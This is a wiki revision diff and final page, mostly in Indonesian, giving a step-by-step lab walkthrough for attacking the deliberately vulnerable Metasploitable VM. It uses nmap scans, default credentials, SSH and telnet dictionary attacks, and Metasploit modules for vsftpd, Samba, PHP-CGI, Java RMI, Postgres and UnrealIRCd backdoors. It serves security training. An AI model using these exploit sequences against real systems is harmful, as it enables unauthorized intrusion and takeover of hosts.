Difference between revisions of "Metasploitable: pentest"

From OnnoWiki
Jump to navigation Jump to search
 
(16 intermediate revisions by the same user not shown)
Line 3: Line 3:
  
  
Metasploitable adalah versi rentan Linux Ubuntu yang secara sukarela dirancang untuk menguji tool keamanan dan mendemonstrasikan kerentanan umum berbasis mesin virtual yang membantu kita melakukan pelatihan keamanan, menguji alat keamanan, dan mempraktekkan teknik pengujian penetrasi umum. VM akan berjalan pada produk VMware terbaru dan teknologi visualisasi lainnya seperti VirtualBox. Anda dapat men-download metasploitable dari
+
Metasploitable adalah versi rentan Linux Ubuntu yang sengaja dirancang untuk menguji tool keamanan dan mendemonstrasikan kerentanan umum berbasis mesin virtual yang membantu kita melakukan pelatihan keamanan, menguji alat keamanan, dan mempraktekkan teknik pengujian penetrasi umum. VM akan berjalan pada produk VMware terbaru dan teknologi visualisasi lainnya seperti VirtualBox. Anda dapat men-download metasploitable dari
  
 
* https://www.vulnhub.com/entry/metasploitable-2,29/
 
* https://www.vulnhub.com/entry/metasploitable-2,29/
Line 10: Line 10:
 
Metasploitable adalah framework yang dapat dieksploitasi yang membantu kita untuk meningkatkan keterampilan kita dan juga membantu penggunaan untuk menggunakan setiap port untuk keuntungan kita karena kita semua tahu bahwa port dan protokol adalah dasar dari peretasan sehingga, oleh karena itu, semakin banyak anda dapat mengambil manfaat dari korban.
 
Metasploitable adalah framework yang dapat dieksploitasi yang membantu kita untuk meningkatkan keterampilan kita dan juga membantu penggunaan untuk menggunakan setiap port untuk keuntungan kita karena kita semua tahu bahwa port dan protokol adalah dasar dari peretasan sehingga, oleh karena itu, semakin banyak anda dapat mengambil manfaat dari korban.
  
Dalam hal ini kita akan menelusuri seluruh konsep metasploitable termasuk cara menginstalnya dan cara meretasnya selangkah demi selangkah. Kami akan mengambil semua port satu per satu yang rentan dan mencoba untuk mengeksploitasinya. Jadi, pertama-tama Anda harus mengunduh metasploit dari tautan di atas. Setelah pengunduhan selesai, buka VirtualBox dan klik open mesin virtual.
+
Dalam hal ini kita akan menelusuri seluruh konsep metasploitable termasuk cara menginstalnya dan cara meretasnya selangkah demi selangkah. Kami akan mengambil semua port satu per satu yang rentan dan mencoba untuk mengeksploitasinya.  
  
After clicking on OK the metasploitable will open in virtual machine and to run it just click on Power on this virtual machine and it will run your metasploitable.
+
==Download & Install==
  
On the verge of getting started it will ask you for username and password. Now, by default the username and passwords are: msfadmin and msfadmin respectively. Once you enter username and password your metasploitable will start.
+
Pertama-tama Anda harus mengunduh metasploit dari tautan berikut,
  
Now that our vulnerable Linux machine is running and now type the ifconfig command to get the IP address
+
* https://www.vulnhub.com/entry/metasploitable-2,29/
 
+
* https://information.rapid7.com/download-metasploitable-2017.html
Now for penetration testing on the metasploitable go to the terminal of your Kali Linux and scan the IP of metasploitable through nmap so that we can which ports are open and this type:
 
  
nmap -sV 192.168.1.106
+
Setelah pengunduhan selesai, buka VirtualBox dan klik open mesin virtual.
  
Due to the nmap command we can see which port is open and which service is going on which port, therefore, we can start our attack one by one to every vulnerable port. So, first we will attack on vsftpd2.3.4. As we know that this version is vulnerable, so let us exploit it. For this, open metasploit and type:
+
Setelah mengklik OK, metasploitable akan terbuka di mesin virtual dan menjalankannya cukup klik pada Power pada mesin virtual ini dan itu akan menjalankan metasploitable anda.
  
search vsftpd 2.3.4
+
Saat start, akan ditanya username password, masukan
  
Typing the above command will show the exploits that will help you in attack the said version. So further type:
+
username msfadmin
 +
password msfadmin
  
use exploit/unix/ftp/vsftpd_234_backdoor
+
==Cek IP==
  
set rhost 192.168.1.106
+
Cek IP address menggunakan
  
set rport 21
+
ifconfig
  
exploit
+
==Asumsi IP metasploitable==
  
Once your attack is executed, you will reach in the shell of the metasploitable and so now you can do as you deserve.
+
Asumsi IP metasploitable
  
Now, we will exploit ssh which works on port number 22. There is already existing exploit for this port. It will help us to apply dictionary attack to crack the password of metasploitable and so we will use it as :
+
192.168.122.134
  
use auxiliary/scanner/ssh/ssh_login
+
==nmap==
  
set rhosts 192.168.1.106
+
Scan sederhana dapat menggunakan nmap
  
set rport 22
+
nmap -sS -v -O 192.168.122.134
  
set user_file /root/Desktop/user.txt
+
Dari hasil scan nmap kita akan bisa melihat port mana yang terbuka service mana yang berjalan di port mana. Kita dapat memulai serangan satu per satu di port yang vulneable.
  
set pass_file /root/Desktop/pass.txt
+
==attack vsftpd==
  
exploit
+
buka metasploit di kali linux, ketik
  
As you can see, after the execution of the file it will start matching all the username with the passwords to find the correct one. And in the end you will have your password along with the username.
+
search vsftpd 2.3.4
  
Now we can use that password to the shell of metasploitable and for this just got to the terminal of Kali and type:
+
Lanjutkan, ketik
  
ssh msfadmin@192.168.1.106
+
use exploit/unix/ftp/vsftpd_234_backdoor
 
+
set rhost 192.168.122.134
Here,
+
set rport 21
 
+
exploit
ssh –> is the service through which we are exploiting
 
 
 
msfadmin –> is the password
 
 
 
192.168.1.106 –> is the victim’s IP address
 
 
 
Upon execution you can see that you will automatically enter its shell.
 
 
 
Now, we will try and attack via telnet which works on port 23. This port will also help us to find password first and then we can enter its shell. So, for this type:
 
 
 
use auxiliary/scanner/telnet/telnet_login
 
  
set rhosts 192.168.1.106
+
Jika berhasil maka anda akan masuk ke shell metasploitable. Jika selesai melakukan pekerjaan attack, ketik
  
set rport 23
+
exit
  
set user_file /root/Desktop/user.txt
+
==attack ssh==
  
set pass_file /root/Desktop/pass.txt
+
Buat file di Kali Linux
  
exploit
+
/root/Desktop/user.txt
 +
/root/Desktop/pass.txt
  
Similarly, as ssh, it will also start dictionary attack and step by step it will find the correct password. Now that you have the password you can log on to metasploitable.
+
Isi user.txt
  
telnet 192.168.1.106
+
msfadmin
 +
user
  
After typing so, it will ask you for the username and password and once you enter these you will enter the metasploitable as shown below:
+
Isi pass.txt
  
Now we will try to exploit the port number 80 on which http services run. For this too there is a pre-installed exploit in metasploit and to exercise the said exploit type:
+
msfadmin
  
use exploit/multi/http/php_cgi_arg_injection
 
  
set rhost 192.168.1.106
+
Masuk ke metasploit, ketik,
  
set rport 80
+
use auxiliary/scanner/ssh/ssh_login
 +
set rhosts 192.168.1.106
 +
set rport 22
 +
set user_file /root/Desktop/user.txt
 +
set pass_file /root/Desktop/pass.txt
 +
exploit
  
exploit
+
Anda akan dapat username & password yang bisa di akses menggunakan ssh
  
After the execution you will enter a meterpreter session of metasploitable as shown.
+
===Remote login dari kali linux===
  
Next we will try to exploit the samba service that is going on the port number 139. For that we will use the following exploit:
+
misalnya IP metasploitable 192.168.122.134
  
use exploit/multi/samba/usermap_script
+
ssh msfadmin@192.168.122.134
  
set rhost 192.168.1.106
+
password
  
set rport 139
+
msfadmin
  
exploit
+
==attack telnet==
  
The execution of this will take you the shell session of metasploit that means you will reach the shell of metasploit.
+
Jalankan metasploit di kali linux, ketik
  
Now, we will use the following exploit:
+
use auxiliary/scanner/telnet/telnet_login
 +
set rhosts 192.168.122.134
 +
set rport 23
 +
set user_file /root/Desktop/user.txt
 +
set pass_file /root/Desktop/pass.txt
 +
exploit
  
use exploit/multi/misc/java_rmi_server
+
Sama dengan ssh, ini adalah dictionary attack. Setelah memperoleh password kita dapat masuk dari kali linux menggunakan
  
set rhost 192.168.1.106
+
telnet 192.168.122.134
  
set rport 1899
+
==attack web==
  
exploit
+
Contoh serangan metasploit ke web di port 80.
 +
Jalankan metasploit di kali linux, ketik
  
Again, after you hit enter button on your keyboard you will have a meterpreter session.
+
use exploit/multi/http/php_cgi_arg_injection
 +
set rhost 192.168.122.134
 +
set rport 80
 +
exploit
  
The next exploit is:
+
Anda akan masuk ke sesi meterpreter dari metasploitable
  
use exploit/linux/postgres/postgres_payload
+
==attack file sharing==
  
set rhost 192.168.1.106
+
Serangan ke file sharing di port 139.
 +
Jalankan metasploit di kali linux, ketik
  
set rport 5432
+
use exploit/multi/samba/usermap_script
 +
set rhost 192.168.122.134
 +
set rport 139
 +
exploit
  
exploit
+
Ini akan masuk ke shell metasploit lagi. Selanjutnya, ketik,
  
Once the command is executed you will enter the meterpreter session as shown above.
+
use exploit/multi/misc/java_rmi_server
 +
set rhost 192.168.122.134
 +
set rport 1899
 +
exploit
  
The exploit that use is related to unreal ircd and to search its exploit type :
+
Ketik "ENTER" kita akan masuk ke sesi meterpreter
  
search Unreal ircd
+
==attack postgres==
  
And the result will be exploits which will help you to attack the victim. As you can see there are three exploits and we will use the latest one.
+
Masuk ke metasploit di kali linux, ketik
  
To the exploit type:
+
use exploit/linux/postgres/postgres_payload
 +
set rhost 192.168.122.134
 +
set rport 5432
 +
exploit
  
use exploit/unix/irc/unreal_ircd_3281_backdoor
+
Jika berhasil, anda akan masuk ke sesi meterpreter
  
set rhost 192.168.1.106
+
==attack ircd==
  
set rport 6667
+
Masuk ke metasploit di kali linux, search Unreal ircd exploit
  
exploit
+
search Unreal ircd
  
And when you will hit enter you will obtain a shell session meaning you will enter the shell of the metasploitable.
+
Ketik,
  
These are all the attacks that you can use against metasploitable and in the process you can learn how to attack a real life victim using different ports.
+
use exploit/unix/irc/unreal_ircd_3281_backdoor
 +
set rhost 192.168.122.134
 +
set rport 6667
 +
exploit
  
 +
Jika berhasil, tekan "ENTER", kita akan masuk ke shell metasploitable.
  
 
==Referensi==
 
==Referensi==

Latest revision as of 04:46, 8 December 2018

sumber: https://www.hackingarticles.in/penetration-testing-skills-practice-metasploitable-beginner-guide/


Metasploitable adalah versi rentan Linux Ubuntu yang sengaja dirancang untuk menguji tool keamanan dan mendemonstrasikan kerentanan umum berbasis mesin virtual yang membantu kita melakukan pelatihan keamanan, menguji alat keamanan, dan mempraktekkan teknik pengujian penetrasi umum. VM akan berjalan pada produk VMware terbaru dan teknologi visualisasi lainnya seperti VirtualBox. Anda dapat men-download metasploitable dari

Metasploitable adalah framework yang dapat dieksploitasi yang membantu kita untuk meningkatkan keterampilan kita dan juga membantu penggunaan untuk menggunakan setiap port untuk keuntungan kita karena kita semua tahu bahwa port dan protokol adalah dasar dari peretasan sehingga, oleh karena itu, semakin banyak anda dapat mengambil manfaat dari korban.

Dalam hal ini kita akan menelusuri seluruh konsep metasploitable termasuk cara menginstalnya dan cara meretasnya selangkah demi selangkah. Kami akan mengambil semua port satu per satu yang rentan dan mencoba untuk mengeksploitasinya.

Download & Install

Pertama-tama Anda harus mengunduh metasploit dari tautan berikut,

Setelah pengunduhan selesai, buka VirtualBox dan klik open mesin virtual.

Setelah mengklik OK, metasploitable akan terbuka di mesin virtual dan menjalankannya cukup klik pada Power pada mesin virtual ini dan itu akan menjalankan metasploitable anda.

Saat start, akan ditanya username password, masukan

username msfadmin
password msfadmin

Cek IP

Cek IP address menggunakan

ifconfig

Asumsi IP metasploitable

Asumsi IP metasploitable

192.168.122.134

nmap

Scan sederhana dapat menggunakan nmap

nmap -sS -v -O 192.168.122.134

Dari hasil scan nmap kita akan bisa melihat port mana yang terbuka service mana yang berjalan di port mana. Kita dapat memulai serangan satu per satu di port yang vulneable.

attack vsftpd

buka metasploit di kali linux, ketik

search vsftpd 2.3.4

Lanjutkan, ketik

use exploit/unix/ftp/vsftpd_234_backdoor
set rhost 192.168.122.134
set rport 21
exploit

Jika berhasil maka anda akan masuk ke shell metasploitable. Jika selesai melakukan pekerjaan attack, ketik

exit

attack ssh

Buat file di Kali Linux

/root/Desktop/user.txt
/root/Desktop/pass.txt

Isi user.txt

msfadmin
user

Isi pass.txt

msfadmin


Masuk ke metasploit, ketik,

use auxiliary/scanner/ssh/ssh_login
set rhosts 192.168.1.106
set rport 22
set user_file /root/Desktop/user.txt
set pass_file /root/Desktop/pass.txt
exploit

Anda akan dapat username & password yang bisa di akses menggunakan ssh

Remote login dari kali linux

misalnya IP metasploitable 192.168.122.134

ssh msfadmin@192.168.122.134

password

msfadmin

attack telnet

Jalankan metasploit di kali linux, ketik

use auxiliary/scanner/telnet/telnet_login
set rhosts 192.168.122.134
set rport 23
set user_file /root/Desktop/user.txt
set pass_file /root/Desktop/pass.txt
exploit

Sama dengan ssh, ini adalah dictionary attack. Setelah memperoleh password kita dapat masuk dari kali linux menggunakan

telnet 192.168.122.134

attack web

Contoh serangan metasploit ke web di port 80. Jalankan metasploit di kali linux, ketik

use exploit/multi/http/php_cgi_arg_injection
set rhost 192.168.122.134
set rport 80
exploit

Anda akan masuk ke sesi meterpreter dari metasploitable

attack file sharing

Serangan ke file sharing di port 139. Jalankan metasploit di kali linux, ketik

use exploit/multi/samba/usermap_script
set rhost 192.168.122.134
set rport 139
exploit

Ini akan masuk ke shell metasploit lagi. Selanjutnya, ketik,

use exploit/multi/misc/java_rmi_server
set rhost 192.168.122.134
set rport 1899
exploit

Ketik "ENTER" kita akan masuk ke sesi meterpreter

attack postgres

Masuk ke metasploit di kali linux, ketik

use exploit/linux/postgres/postgres_payload
set rhost 192.168.122.134
set rport 5432
exploit

Jika berhasil, anda akan masuk ke sesi meterpreter

attack ircd

Masuk ke metasploit di kali linux, search Unreal ircd exploit

search Unreal ircd

Ketik,

use exploit/unix/irc/unreal_ircd_3281_backdoor
set rhost 192.168.122.134
set rport 6667
exploit

Jika berhasil, tekan "ENTER", kita akan masuk ke shell metasploitable.

Referensi

Pranala Menarik